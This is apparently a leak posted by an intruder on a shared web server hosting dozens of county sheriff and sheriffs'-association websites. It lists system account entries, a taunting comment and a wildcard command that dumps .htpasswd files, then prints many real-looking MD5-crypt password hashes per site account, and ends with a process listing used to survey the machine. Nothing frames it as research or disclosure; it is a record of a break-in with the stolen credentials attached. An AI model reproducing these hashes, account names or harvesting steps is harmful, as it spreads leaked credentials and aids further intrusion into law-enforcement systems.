pcsoks:x:10046:2522::/var/www/vhosts/prattcountysheriff.com:/bin/false

johms_sync:x:10047:10047::/var/www/vhosts/jocomosheriff.org/home:/bin/bash

hcsar:x:10022:2522::/var/www/vhosts/howardcountysheriffar.com:/bin/false

hscar:x:10048:2522::/var/www/vhosts/hotspringcountysheriff.com:/bin/false

pcsoia:x:10049:2522::/var/www/vhosts/plymouthcountysheriff.com:/bin/false

mcsd:x:10050:2522::/var/www/vhosts/marioncountysheriffar.com:/bin/false

wsoks:x:10051:2522::/var/www/vhosts/woodsonsheriff.com:/bin/false

mosa2010:x:10052:10052::/var/www/vhosts/mosheriffs.com/httpdocs/academy/

file_manager:/bin/bash

faoret:x:10053:2522::/var/www/vhosts/faoret.com:/bin/false

bcso_tiger:x:10054:2522::/var/www/vhosts/boonesheriff.com/home:/bin/false

stcsd:x:10055:2522::/var/www/vhosts/stonecountysheriff.com:/bin/false

ccsoms:x:10056:2522::/var/www/vhosts/coahomacountysheriff.com:/bin/false

kcsoms:x:10057:2522::/var/www/vhosts/kempercountysheriff.com:/bin/false

pcsoks_sync:x:10058:10058::/var/www/vhosts/prattcountysheriff.com/home:/bin/

false

mocsd:x:10059:2522::/var/www/vhosts/monroecountysheriffar.com:/bin/false

postfix:x:89:89::/var/spool/postfix:/sbin/nologin

bcsoga:x:10060:2522::/var/www/vhosts/bakercountysheriffoffice.org:/bin/false

jonms_sync:x:10061:10061::/var/www/vhosts/jonesso.com/home:/bin/bash

jcsoks_sync:x:10062:10062::/var/www/vhosts/jeffersoncountykssheriff.com/home:/

bin/bash

cpsola:x:10063:2522::/var/www/vhosts/cameronso.org:/bin/false

cgsomo:x:10064:2522::/var/www/vhosts/capecountysheriff.org:/bin/false

sfsoar:x:10065:2522::/var/www/vhosts/stfranciscountysheriff.org:/bin/false

sfsoar_sync:x:10066:10066::/var/www/vhosts/stfranciscountysheriff.org/home:/bin/

bash

code:x:10067:2522::/var/www/vhosts/mostwantedwebsites.net/subdomains/code:/bin/

false

fcsoga:x:10068:2522::/var/www/vhosts/floydcountysheriff.org:/bin/false

mcsoga:x:10069:2522::/var/www/vhosts/meriwethercountysheriff.org:/bin/false

code2:x:10070:2522::/var/www/vhosts/admin.mostwantedwebsites.net:/bin/false

kcsoil:x:10071:2522::/var/www/vhosts/knoxcountysheriffil.com:/bin/false

mcsoal:x:10072:2522::/var/www/vhosts/marionsoal.com:/bin/false

sgsomo:x:10073:2522::/var/www/vhosts/sgcso.com:/bin/false

gcsoms:x:10074:2522::/var/www/vhosts/georgecountymssheriff.com:/bin/false

stoms:x:10075:2522::/var/www/vhosts/stonecountymosheriff.com:/bin/false

hcsar_sync:x:10076:10076::/var/www/vhosts/howardcountysheriffar.com/home/:/bin/

bash

alsa:x:10077:2522::/var/www/vhosts/alabamasheriffs.com:/bin/false

pcsoar:x:10078:2522::/var/www/vhosts/perrycountysheriffar.org:/bin/false

rcsd:x:10079:2522::/var/www/vhosts/randolphcountysheriff.org:/bin/false

tisoms:x:10081:2522::/var/www/vhosts/tishomingocountysheriff.com:/bin/false

stoms_sync:x:10082:10082::/var/www/vhosts/stonecountymosheriff.com/home:/usr/

libexec/openssh/sftp-server

prsoar:x:10083:2522::/var/www/vhosts/prairiecountysheriff.org:/bin/false

mcsd_sync:x:10084:10084::/var/www/vhosts/marioncountysheriffar.com/home/xmlapp:/

bin/bash

jccgms:x:10086:2522::/var/www/vhosts/jeffersoncountyms.gov:/bin/false

ccsook:x:10087:2522::/var/www/vhosts/sheriffcomanche.com:/bin/false

fcsoar:x:10088:2522::/var/www/vhosts/fultoncountyso.org:/bin/false

poalac:x:10085:2522::/var/www/vhosts/poalac.org:/bin/false

arsa:x:10091:2522::/var/www/vhosts/arkansassheriffsassociation.com:/bin/false

rcpica:x:10080:2522::/var/www/vhosts/rcpi-ca.org:/bin/false

ciga:x:10092:2522::/var/www/vhosts/cityofgassville.org:/bin/false

sfcgar:x:10093:2522::/var/www/vhosts/stfranciscountyar.org:/bin/false

lcsomo:x:10094:2522::/var/www/vhosts/lcsdmo.com:/bin/false

tcsoal:x:10095:2522::/var/www/vhosts/talladegasheriff.org:/bin/false

jwiegand:x:10096:10096::/home/jwiegand:/bin/bash

bcsf:x:10097:2522::/var/www/vhosts/baxtercountysherifffoundation.org:/bin/false

prsoms:x:10089:2522::/var/www/vhosts/prentisscountymssheriff.com:/bin/false

acsoms:x:10098:2522::/var/www/vhosts/adamscosheriff.org:/bin/false

kssa:x:10099:2522::/var/www/vhosts/kansassheriffs.org:/bin/false

// CAT'N HUNDREDS OF .HTPASSWD FILES IN ONE COMMAND LIKE A BOSS

$ cat /var/www/vhosts/*/pd/*

2010user:$1$YfJPNAST$w9rRAaYhAMjpkw.GRLUD90

jdpa:$1$e1JbcQkZ$sR59gW8uPd/6Dyae9xneL0

jdpa:$1$uBEldfcW$mzSY61wj97PN41JWNPcA9/

jdpa:$1$e1JbcQkZ$sR59gW8uPd/6Dyae9xneL0

acsoms:$1$/OuADgxB$l7pPU2kXeKlw7Iz9NLGID.

acsoms:$1$uDsXPWpq$mhRoR3B3JicVBpuHWxYue1

acsoms:$1$uDsXPWpq$mhRoR3B3JicVBpuHWxYue1

code:$1$7.KAx/YD$J7SuxsDsBOij.qgPD3GJ60

code:$1$7.KAx/YD$J7SuxsDsBOij.qgPD3GJ60

alsa:$1$gg9rFhvF$S41htlhsl3AJYZu4dKWR50

alsa:$1$RnNxf5wV$NMmcQvODrjBzyi0RI1MqO.

alsa:$1$RnNxf5wV$NMmcQvODrjBzyi0RI1MqO.

arsa:$1$uKT57hqw$3KrrKngKKD.J8nFMYq0nf/

arsa2:$1$T5fkiwpg$e/uoUu17TnKUZU2pcgZhw1

arsa:$1$3GhQNCaB$27W57EtzM3cih1f3mq3PJ.

arsa2:$1$T5fkiwpg$e/uoUu17TnKUZU2pcgZhw1

arsa:$1$3GhQNCaB$27W57EtzM3cih1f3mq3PJ.

bcsoga:$1$wD0B3RJw$F/kRNzUrqyAsXGEZUUt7t.

bcsoga:$1$WYfgp0d5$yGsh3sHH74GpPqmsI./K..

bcsoga:$1$WYfgp0d5$yGsh3sHH74GpPqmsI./K..

barms:$1$SUoLPR6X$xTEXrkDGFZax3XGxa0RIv.

barms:$1$n5/TqDsD$Je.PVoLmE.WjgYgnPOOZ91

barms:$1$2bdOu.yt$HfX7Ziq4mwgqQxFCBlnNq0

barms:$1$SUoLPR6X$xTEXrkDGFZax3XGxa0RIv.

barms:$1$n5/TqDsD$Je.PVoLmE.WjgYgnPOOZ91

bcsd:$1$.wyutJHS$fI7mFoV8F0txtXS3yCYxr.

bcsd:$1$8HNY0AzH$FLIStjcXdzSLFnVcWOs7/1

bcsf:$1$/xEB/mNM$5JyBevwhGqzByNokDINVe/

bcsf:$1$hRqF1Z2z$/FHJTOkZj0hUgiPlQ0vfc/

bcsf:$1$hRqF1Z2z$/FHJTOkZj0hUgiPlQ0vfc/

bocg:$1$d04I8Pzb$W0qBTons8Dmm2Jw9We3xB/

bocg:$1$02/JMqdi$AlaU02rOAV3KvEnUNNL8D0

bocg:$1$GvD5EuF.$RZ/I71SmN2YCppnS3KtbT0

bocg:$1$02/JMqdi$AlaU02rOAV3KvEnUNNL8D0

bocs:$1$oZB0olYk$/qQ.rLe8/yBnA5lT4HDga1

bocs:$1$VKqRM2ax$zoW/qKKWb8gOJtgV0fq4l0

bocs:$1$qsQEjN0k$8UNgs23OwLrA73XUXxSCa.

bocs:$1$VKqRM2ax$zoW/qKKWb8gOJtgV0fq4l0

cpsola:$1$A0/je.pN$ZGoDb3fmCJdQ1qUB6aRhk1

cpsola:$1$xW03epN7$kzwfnnjUKA9gDDkKY8wW90

cpsola:$1$xW03epN7$kzwfnnjUKA9gDDkKY8wW90

cgsomo:$1$VEkM1y42$PkxqdiFVBiJ6pt/lbKd1M1

cgsomo:$1$pxHLS2OD$o2/3rANs15wVSytWjf2dW.

cgsomo:$1$VEkM1y42$PkxqdiFVBiJ6pt/lbKd1M1

cgsomo:$1$pxHLS2OD$o2/3rANs15wVSytWjf2dW.

ccsal:$1$nqrzKwH1$1SUCJG3Ge1jLbd6a4pd.61

ccsal:$1$P2GM8ay4$CT6rlv6.Pa.gnGvdH/jGd0

ccsal:$1$IexvBxv4$d.exkq9idTn05wW6smXSF1

ccsal:$1$P2GM8ay4$CT6rlv6.Pa.gnGvdH/jGd0

ccsoks:$1$KKczisBp$d1rBOCK8iRkjmBZhv.YXp.

ccsoks:$1$BbttpHqg$TzMxb1f40QefP8kSIEpJn/

ciga:$1$Rv6VwWuC$vB55fX6KtgnttO7Bwjni71

ciga:$1$TmVOejq7$6l3ck2oHWua3./QacXOOY0

ciga:$1$Rv6VwWuC$vB55fX6KtgnttO7Bwjni71

ciga:$1$TmVOejq7$6l3ck2oHWua3./QacXOOY0

ciwy:$1$/DFbGKuZ$NNH1VE8TXfaBhuJHDca2x1

ciwy:$1$Hj5GiFRd$67iKTvcJ/vIn5QhHz0GSi.

ciwy:$1$9olIl6Nc$ycMPhxfVWGJ5Ka5ZLlEtK0

ciwy:$1$Hj5GiFRd$67iKTvcJ/vIn5QhHz0GSi.

ccsd:$1$IT4RKfjK$um0Ty6wMJ8O7kIIbIJqRD1

ccsd:$1$MtoFD9pW$WwKV7ocH2WZ4XeQIUji2t.

ccsd:$1$SORBbPS1$MPxim.kDNpNeuwwAE2Ugb0

ccsd:$1$MtoFD9pW$WwKV7ocH2WZ4XeQIUji2t.

ccsoms:$1$PGQZTZay$8g.aw5516ifzB9pfGUdZX.

ccsoms:$1$1jGRZXFI$M.ZHK0GCyYN9fDSzvXJqj1

ccsoms:$1$1jGRZXFI$M.ZHK0GCyYN9fDSzvXJqj1

crcg:$1$ygtelVAp$E9V85e3doWLLyyCMCv2KB1

crcg:$1$5su/.Qwz$X2HHctVlA6/HYhpzsR0c4.

crcg:$1$5su/.Qwz$X2HHctVlA6/HYhpzsR0c4.

crcsd:$1$r7WoQcbv$fR4knFo1YqBYUb91ES7/K.

crcsd:$1$cEVq9UZj$6hN2GCkyMdjGihvuErMm5.

crcsd:$1$cEVq9UZj$6hN2GCkyMdjGihvuErMm5.

dcsd:$1$/3GteTce$sYf4e6A7O0ais2J1EyTMz.

dcsd:$1$3uDJVnXz$ACH.YfW7RD6IkUmBJw.Qf1

dcsd:$1$BBBW.zd2$G4ZJegTfHreCJXwojwA8P0

dcsd:$1$3uDJVnXz$ACH.YfW7RD6IkUmBJw.Qf1

fcsoga:$1$oC0dNlM6$GfFCuZ2N2UnKMI9MZWbwb1

fcsoga:$1$OFx4pJAP$rtexMxn/zMfeVJ5X0b8Ht0

fcsoga:$1$OFx4pJAP$rtexMxn/zMfeVJ5X0b8Ht0

fcsoar:$1$NV21fnUn$TKRx2pGwv65iFBNS14mTF0

fcsoar:$1$NV21fnUn$TKRx2pGwv65iFBNS14mTF0

gcsoms:$1$Cp0Vf.Mu$9eMW4Joy12hktH7WGrBgE/

gcsoms:$1$ZJfK81Ef$mxUuwQyIxgR9Tcry9GaPJ0

gcsoms:$1$Cp0Vf.Mu$9eMW4Joy12hktH7WGrBgE/

gcsoms:$1$ZJfK81Ef$mxUuwQyIxgR9Tcry9GaPJ0

grcg:$1$Ivu4aPQu$weOoXmrm8jtNOUrFTS3vf.

grcg:$1$BtNB1Qvt$MECZW/z2scG0.YmU0275P1

grcg:$1$HPX7vhZO$LWzATw3fluPOYFYnDd3I61

grcg:$1$BtNB1Qvt$MECZW/z2scG0.YmU0275P1

gcsd:$1$T7O8tM.l$AUYTc4uhY7aYuhVfHNW/9/

gcsd:$1$.Kid76wv$TXtyOAf2OBlWRYpLETtmI/

gcsd:$1$07x6ii.Y$K33yOQCuMu9juWBU0.tw31

gcsd:$1$.Kid76wv$TXtyOAf2OBlWRYpLETtmI/

hcsoks:$1$3qklJZQ5$ERPeSxH1DtuX2pis0ah0q0

hcsoks:$1$AuLMRUku$8SKs01E6RyoJdROiAYDyc1

hcsoks:$1$AuLMRUku$8SKs01E6RyoJdROiAYDyc1

hscar:$1$gJJLpsPa$lQkGfO6sT0TM/p/ACmieM0

hscar:$1$7a5hW/P0$MQLz4hMPtybIEnXacaxkB/

hscar:$1$7a5hW/P0$MQLz4hMPtybIEnXacaxkB/

hcsar:$1$Jy4Wo5AA$dgDDznszPUBYPmuM7eBj9.

hscar:$1$563phfjq$fJXMTTDBQFGqbC41mVBCc1

hcsar:$1$mwnHyqQU$tLX26Szlbqp7IXYIp5Djt0

hscar:$1$563phfjq$fJXMTTDBQFGqbC41mVBCc1

hcsar:$1$mwnHyqQU$tLX26Szlbqp7IXYIp5Djt0

izcg:$1$SzRnGt.T$085pTzlcqWgJv7DguG6dv1

izcg:$1$rxszlSxW$JxnDEaPC8rll/JZuNY8sI/

izcg:$1$rxszlSxW$JxnDEaPC8rll/JZuNY8sI/

icsd:$1$XwGJZ7Ia$sj99HKjkzILx6qGDiWmHy.

icsd:$1$VHblzCiz$PK3BhSLA03R2DgweLIhb.0

icsd:$1$vo3ZSlXF$DTLKCc/7z6IFgvbFtvCAT1

icsd:$1$VHblzCiz$PK3BhSLA03R2DgweLIhb.0

izhth:$1$mrQmTDHz$Nr02zDwC5m7NxplWZWW0O/

izhth:$1$kW3h3D6.$ti22h0sbYTzw/Ofgjk8Rm1

izhth:$1$IbDSXX4O$sFVTpg5ts1EagLkzoNZQ30

izhth:$1$kW3h3D6.$ti22h0sbYTzw/Ofgjk8Rm1

jcsd:$1$ZkEh5MIb$v3l1z3PQZ5yyG5ABzWef2/

jcsd:$1$A87LOoWD$u80mHmVF294QXfQ7dVjb.0

jcsd:$1$HgNpXLdQ$KPP62pOHPjl7XslEBTqGH/

jcsd:$1$A87LOoWD$u80mHmVF294QXfQ7dVjb.0

jcsoks:$1$Z/D6TvAM$JGvIns6wx.RCPwv0C51TJ/

jcsoks:$1$OHfiOqfm$8tGCZ2uTAHXRBRNyJqazZ.

jcsoks:$1$OHfiOqfm$8tGCZ2uTAHXRBRNyJqazZ.

jccgms:$1$aHstkoLz$tOpRH9HwTGLjSF7YZRiuo.

jccgms:$1$cPnrWOYL$jpmVU3beLfxNR.98st9wR.

jccgms:$1$xi9Cf0im$4vC24C1vlcoteo1aDEFJW.

jccgms:$1$cPnrWOYL$jpmVU3beLfxNR.98st9wR.

johms:$1$fmryjChe$CwJyPptiu0Iwcai2LUTPu0

johms:$1$EGoRh47t$VeQc8nUMJpn0S0fPyvp0i1

johms:$1$nykSrZ50$0yH62S8FZq3NOczux2cjC/

johms:$1$EGoRh47t$VeQc8nUMJpn0S0fPyvp0i1

jocsd:$1$s63jViKP$gaT9byX/ySNJDMkA5.PCd.

jocsd:$1$9Zmq1s1M$/xBn12NyVfewPRMH0J73M1

jocsd:$1$u.mk/ipa$.WSRBIK6MvsWHcfTMt//I/

jocsd:$1$9Zmq1s1M$/xBn12NyVfewPRMH0J73M1

jonms:$1$fLjLWKCb$UDgyy9UzkwyiJC7AWtD40/

jonms:$1$GAvUpe2m$GBlG9CkDHQT7/w5eTW/Zt0

jonms2:$1$vyR1pe5I$ID4xTk5I3FHrrZ3BhYvgS.

jonms:$1$GAvUpe2m$GBlG9CkDHQT7/w5eTW/Zt0

jonms2:$1$vyR1pe5I$ID4xTk5I3FHrrZ3BhYvgS.

kssa:$1$YlbQvrcd$ruaMsfYDwhVlH1k/LGlIJ.

kssa:$1$nhxP66t9$GECAPnEVRDk9YnmSpzBzw/

kssa:$1$nhxP66t9$GECAPnEVRDk9YnmSpzBzw/

kcsoms:$1$goZMALd1$JnxVQ9J603tEsthqkadvE.

kcsoms:$1$Aku.pAac$sQku4Yf6IslqTJkGHyAYS1

kcsoms:$1$Aku.pAac$sQku4Yf6IslqTJkGHyAYS1

kcsoil:$1$4XOK98tG$kjOUaIN3ZNZepl3aCHijc.

kcsoil:$1$mnLz6xRu$uymq2TMKdpBwAmMiLszwK0

kcsoil:$1$mnLz6xRu$uymq2TMKdpBwAmMiLszwK0

lawmo:$1$MezHiiqn$OoLtNNLAm20gBBvW0BtOB0

lawmo:$1$h11BRv3g$wA.ITq8U0Cq4N4ZHoDVmC0

lawmo:$1$5jjY0Omy$eWZkfvCtF0tLdyDv9fmnC0

lcsomo:$1$I/cdxg/g$Pn2tTJK776Si9phzUfNzT1

lcsomo:$1$MkJfhMLZ$rAq1JH9h2GUCMAt2ee2Pe.

lcsomo:$1$MkJfhMLZ$rAq1JH9h2GUCMAt2ee2Pe.

mcsd:$1$NZpwhOoE$4zeC8H.PhoyVjsBhB4VFb1

mcsd:$1$7WN0tH.P$dF0W1vtyA905OcSktC2TG0

mcsd:$1$7WN0tH.P$dF0W1vtyA905OcSktC2TG0

mcsoal:$1$pXqWNJx3$1brOy.05LrQ82qohEMM5k0

mcsoal:$1$1/1E1eTW$epzJFtOGo/Me/eeo.6Dg//

mcsoal:$1$pXqWNJx3$1brOy.05LrQ82qohEMM5k0

mcsoal:$1$OPKYzsqo$WmTHzrV/WlbZPH4JWKQ41.

mcmtn:$1$dJKz4stC$wxWzTBkC76Mox8yv5i8z9/

mcmtn:$1$eiPrIslY$DwuwtcCE/lZGRRERwQzLj.

mcmtn:$1$AGtoxXro$zlQV8/C674RTOhMwp9Pqf1

mcmtn:$1$eiPrIslY$DwuwtcCE/lZGRRERwQzLj.

mcsoga:$1$p2oL7Pi5$LusOSWnvUHofJ0iAvhvEr0

mcsoga:$1$JBIgDN3w$NaxB7Cv29dmMlHu7SeULe0

mcsoga:$1$JBIgDN3w$NaxB7Cv29dmMlHu7SeULe0

mocsd:$1$1bJZUS9v$9cPKxA8hiX1bKbCz6Js1i1

mocsd:$1$SsZ3rxzM$knv3hb7EWCbl8PV5HKL7H/

mocsd:$1$SsZ3rxzM$knv3hb7EWCbl8PV5HKL7H/

mosa:$1$KHDMeYMH$n2TpSddsFNMedje0Wae1n0

mosa:$1$q4tmIHbo$ntiw9G1B1q.WciNBRMivy.

mosa:$1$KHDMeYMH$n2TpSddsFNMedje0Wae1n0

mosa:$1$q4tmIHbo$ntiw9G1B1q.WciNBRMivy.

CityPass:$1$pJ75xXss$N1LTh9EwM.aKAeZBjdp7N/

PerryCounty:$1$T6K61l6D$05/rRhPd6fDPqVuJUQKfF/

bjm2:$1$siaaoUej$HKLUXyUyF1MDSxZxZwuA60

bjm:$1$bXLmD2bt$4Rk5jfA2x8UcJ7W4Tw35s0

bjm2:$1$siaaoUej$HKLUXyUyF1MDSxZxZwuA60

bjm:$1$Sx95fGzg$6ASZ4J6kjziYIDH6xQcki1

2010user:$1$vFJrv2A6$K82FAw89ZvDc1pvHdLhA21

bjm:$1$Ok6D4NjH$EwV/0tzoir0Jg7tMNdaCi0

bjm:$1$Ds5nOfeW$snloc4PMymDdgG5ld6wjw/

bjm:$1$Ok6D4NjH$EwV/0tzoir0Jg7tMNdaCi0

ncsd:$1$3Ocas0HS$Wg2AZygMmPne.rCxh4n9Y0

ncsd:$1$oG2ozgkS$rWU7H1tSjruBwWTcgp7/Q1

ncsd:$1$bSp.iYg8$cr1ZzEYuBTVU.vCPhC6sw/

ncsd:$1$oG2ozgkS$rWU7H1tSjruBwWTcgp7/Q1

pcsoar:$1$K6/0rhqT$wRDJbN4R.bqsfghHNriYL0

pcsoar:$1$UccqZPzO$B340qL0btZjpC4B5sXjRA0

pcsoar:$1$K6/0rhqT$wRDJbN4R.bqsfghHNriYL0

pcsoar:$1$UccqZPzO$B340qL0btZjpC4B5sXjRA0

pcsoia:$1$e3ASKnqy$ps9LSniLjC3kOkGaGn5YM0

pcsoia:$1$yQNrFpc4$RHckr28Py0PEuaud1iwo50

pcsoia:$1$yQNrFpc4$RHckr28Py0PEuaud1iwo50

poalac:$1$wHCRN78K$bCGrbmh1nNblDl7T/qzaj.

poalac:$1$JsmvqHiU$o/tq6grKR/zCLOY2Uz9gS1

poalac:$1$wHCRN78K$bCGrbmh1nNblDl7T/qzaj.

poalac:$1$JsmvqHiU$o/tq6grKR/zCLOY2Uz9gS1

polms:$1$0WmykzWZ$TliFQQUb.tPhPMpuuaotW0

polms:$1$AWXV65hR$v1sMwFsSjZNrkfrNqgHmy.

polms:$1$0WmykzWZ$TliFQQUb.tPhPMpuuaotW0

polms:$1$AWXV65hR$v1sMwFsSjZNrkfrNqgHmy.

prsoar:$1$2jmIGv7j$0zSfngOL9UeBLq/zsuFGg1

prsoar:$1$EU8wJZpQ$J8f.N8UKLOOfAJEfbUTAw0

prsoar:$1$EU8wJZpQ$J8f.N8UKLOOfAJEfbUTAw0

pcsoks:$1$84DZ5jUv$22478RXYSJ83Yon/VbXoq0

pcsoks:$1$dWgONAoy$XDqV96Eij0BF.jLjwW7qr.

pcsoks:$1$dWgONAoy$XDqV96Eij0BF.jLjwW7qr.

prsoms:$1$Nfacesfq$cwqZNxlFjJo8N/RrOodIY1

prsoms:$1$iuK4mNPP$4MRRvrhMfc.sniKZxGwFS.

prsoms:$1$iuK4mNPP$4MRRvrhMfc.sniKZxGwFS.

rcsd:$1$aM0/EhqP$HPTN/wX2L0ErPIsaYADow1

rcsd:$1$bJTnrSZb$irgq.KT3PHaIXcb7fD9/11

rcsd:$1$bJTnrSZb$irgq.KT3PHaIXcb7fD9/11

rcpica:$1$6FIHrPeK$mspB9nNY4YNy/.9brKRlP.

rcpica:$1$SlOVAGuO$CrMYHXoe5EsoBX5C3HN1R1

rcpica:$1$SlOVAGuO$CrMYHXoe5EsoBX5C3HN1R1

sacsd:$1$ZLGR289Y$KevSJOo0PezTAqatJUouK.

sacsd:$1$L6oPyMeK$WJlfrokd6bZl8XzNAuwRx1

sacsd:$1$dIxeOzw5$SdsN7F6iYxyryZLodaDHC0

sacsd:$1$L6oPyMeK$WJlfrokd6bZl8XzNAuwRx1

scsd:$1$aRIkZHPq$dYZwP7SrhhumFy6QVTNr1/

scsd:$1$oJwcYy6M$/CY4yYYTWLsgIPvuGA6qZ0

scsd:$1$L05Gndoq$V8OevuZqUMK//gsBOPmxq1

scsd:$1$oJwcYy6M$/CY4yYYTWLsgIPvuGA6qZ0

sgsomo:$1$kFw.79HG$KMcvV/zhzzB2PUzy0860N.

sgsomo:$1$gG5yK4xU$ONDYP.tlcg6YTaB9NSAyJ0

sgsomo:$1$gG5yK4xU$ONDYP.tlcg6YTaB9NSAyJ0

shsd:$1$2Qzvqur1$erX5RIvC9bt48DoK9UXgn1

shsd:$1$KkowHXJI$0OENU1ePlaa16r6/R66RM.

shsd:$1$dWHRMEmO$r0SD3BNmRZFNgcJjd2zJh.

shsd:$1$KkowHXJI$0OENU1ePlaa16r6/R66RM.

ccsook:$1$vI8JJAm1$XXWEHCO6htvjMb56c/HE9/

ccsook:$1$jcQ9B6fS$h6xEznJEHVN2AJCwSIarf1

ccsook:$1$jcQ9B6fS$h6xEznJEHVN2AJCwSIarf1

sfcgar:$1$EqTn7VjG$LWSf095sVWtuTPWQioUVt/

sfcgar:$1$MUBD7oyy$.sTGmbMwRsdBYrfQXfbh6/

sfcgar:$1$MUBD7oyy$.sTGmbMwRsdBYrfQXfbh6/

sfsoar:$1$dvPtn2zd$GlH7j4etEjFOySAHu4oZV0

sfsoar:$1$pZBZJ3Bf$rQlq6FDy7VPjhPYFZ1P64.

sfsoar:$1$pZBZJ3Bf$rQlq6FDy7VPjhPYFZ1P64.

stoms:$1$2VDTPaiT$o6kUTW6UXLdy6zeqLL2q00

stoms:$1$WyeLFT5e$6KzSbxJ9MuqkYgAaonFqh.

stoms:$1$WyeLFT5e$6KzSbxJ9MuqkYgAaonFqh.

stcsd:$1$36mnxETG$J0BtoGvBQUIlajywJ65EU.

stcsd:$1$TRu9HU67$tsjdX..cGgp4/HOA5IRBk1

stcsd:$1$TRu9HU67$tsjdX..cGgp4/HOA5IRBk1

tcsoal:$1$8IvtSsof$Js4ss4101mHXRhS1UgW.z/

tcsoal:$1$Yf8T/mm8$xbXyku1q9H0g30wAxwler/

tcsoal:$1$/Ciht4fS$S4Hx3kHnNkm3Vu2Cl/E7.1

tcsoal:$1$Yf8T/mm8$xbXyku1q9H0g30wAxwler/

tcsoms:$1$aCobysj2$oZShF1So8TZCuH8dq79UE0

tcsoms:$1$ow2DKzUF$FKjZPhq5ahj/bWC.uPAl61

tcsoms:$1$ow2DKzUF$FKjZPhq5ahj/bWC.uPAl61

tisoms:$1$8mQ6hE6A$CvYlVP6fPLmuSHdyDJg4v1

tisoms:$1$BuFAYulO$kLtpxApIF4yvonPrSmfFW1

tisoms:$1$BuFAYulO$kLtpxApIF4yvonPrSmfFW1

tunms:$1$6F5myr2t$KmJLCml.CybyQjDqoG3TG1

tunms:$1$O42Xnjjg$pKnLJUYfC.weyl1U32Dtf1

tunms:$1$uWPMvVMY$v3Qc7eyUJB7Evpt0iSnOq1

tunms:$1$O42Xnjjg$pKnLJUYfC.weyl1U32Dtf1

vbcsd:$1$C0j6Be38$To6eb4DzaCtA46pN/x6sG.

vbcsd:$1$4e/iDO4I$6157lAdEF2IaaYKa2NwNS.

wcsoks:$1$WO9U6YiB$wEEafCY2i86zRpEi1hce20

wcsoks:$1$HZoMeTi0$gwdZvPQTqavG4sAiDlEXZ1

wsoks:$1$eSaYt0Fv$vi9zN.GAwbKGQoslpxDr11

// LETS SEE WHAT KINDA SHIT THEY RUNNIN

$ ps -aux

USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND

root 1 0.0 0.0 2156 532 ? Ss Feb22 3:04 init [3]

root 2 0.0 0.0 0 0 ? S Feb22 0:35 [migration/0]

root 3 0.0 0.0 0 0 ? SN Feb22 4:16 [ksoftirqd/0]

root 4 0.0 0.0 0 0 ? S Feb22 0:00 [watchdog/0]

root 5 0.0 0.0 0 0 ? S Feb22 0:30 [migration/1]

root 6 0.0 0.0 0 0 ? SN Feb22 5:09 [ksoftirqd/1]

root 7 0.0 0.0 0 0 ? S Feb22 0:00 [watchdog/1]

root 8 0.0 0.0 0 0 ? S Feb22 0:38 [migration/2]

root 9 0.0 0.0 0 0 ? SN Feb22 3:03 [ksoftirqd/2]

root 10 0.0 0.0 0 0 ? S Feb22 0:00 [watchdog/2]

root 11 0.0 0.0 0 0 ? S Feb22 0:53 [migration/3]

root 12 0.1 0.0 0 0 ? SN Feb22 337:41 [ksoftirqd/3]

root 13 0.0 0.0 0 0 ? S Feb22 0:00 [watchdog/3]

root 14 0.0 0.0 0 0 ? S< Feb22 0:01 [events/0]

root 15 0.0 0.0 0 0 ? S< Feb22 0:00 [events/1]

root 16 0.0 0.0 0 0 ? S< Feb22 0:01 [events/2]

root 17 0.0 0.0 0 0 ? S< Feb22 0:13 [events/3]

root 18 0.0 0.0 0 0 ? S< Feb22 0:00 [khelper]

root 19 0.0 0.0 0 0 ? S< Feb22 0:00 [kthread]

root 25 0.0 0.0 0 0 ? S< Feb22 0:01 [kblockd/0]

root 26 0.0 0.0 0 0 ? S< Feb22 0:02 [kblockd/1]

root 27 0.0 0.0 0 0 ? S< Feb22 0:02 [kblockd/2]

root 28 0.0 0.0 0 0 ? S< Feb22 0:27 [kblockd/3]

root 29 0.0 0.0 0 0 ? S< Feb22 0:00 [kacpid]

root 128 0.0 0.0 0 0 ? S< Feb22 0:00 [cqueue/0]

root 129 0.0 0.0 0 0 ? S< Feb22 0:00 [cqueue/1]

root 130 0.0 0.0 0 0 ? S< Feb22 0:00 [cqueue/2]

root 131 0.0 0.0 0 0 ? S< Feb22 0:00 [cqueue/3]

root 134 0.0 0.0 0 0 ? S< Feb22 0:00 [khubd]

root 136 0.0 0.0 0 0 ? S< Feb22 0:00 [kseriod]

root 213 0.0 0.0 0 0 ? S< Feb22 71:43 [kswapd0]

root 214 0.0 0.0 0 0 ? S< Feb22 0:00 [aio/0]

root 215 0.0 0.0 0 0 ? S< Feb22 0:00 [aio/1]

root 216 0.0 0.0 0 0 ? S< Feb22 0:00 [aio/2]

root 217 0.0 0.0 0 0 ? S< Feb22 0:00 [aio/3]

root 372 0.0 0.0 0 0 ? S< Feb22 0:00 [kpsmoused]

root 417 0.0 0.0 0 0 ? S< Feb22 0:00 [ata/0]

root 418 0.0 0.0 0 0 ? S< Feb22 0:00 [ata/1]

root 419 0.0 0.0 0 0 ? S< Feb22 0:00 [ata/2]

root 420 0.0 0.0 0 0 ? S< Feb22 0:00 [ata/3]

root 421 0.0 0.0 0 0 ? S< Feb22 0:00 [ata_aux]

root 427 0.0 0.0 0 0 ? S< Feb22 0:00 [scsi_eh_0]

root 428 0.0 0.0 0 0 ? S< Feb22 0:00 [scsi_eh_1]

root 444 0.0 0.0 0 0 ? S< Feb22 0:00 [scsi_eh_2]

root 445 0.0 0.0 0 0 ? S Feb22 0:00 [hpt_wt]

root 446 0.0 0.0 0 0 ? S< Feb22 151:44 [kjournald]

root 471 0.0 0.0 0 0 ? S< Feb22 1:12 [kauditd]

root 504 0.0 0.0 2376 652 ? S< Feb22 0:00 [kmpathd/0]

root 1304 0.0 0.0 0 0 ? S< Feb22 0:00 [kmpathd/1]

root 1305 0.0 0.0 0 0 ? S< Feb22 0:00 [kmpathd/2]

root 1306 0.0 0.0 0 0 ? S< Feb22 0:00 [kmpathd/3]

root 1345 0.0 0.0 5072 1608 ? S Jul16 0:01

/usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin

/usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir

popuser 1346 0.0 0.0 7296 1144 ? S Jul16 0:03 /usr/bin/imapd

Maildir

root 1355 0.0 0.0 0 0 ? S< Feb22 0:00 [kjournald]

root 1387 0.0 0.0 5072 1848 ? S Jul16 0:01

/usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin

/usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir

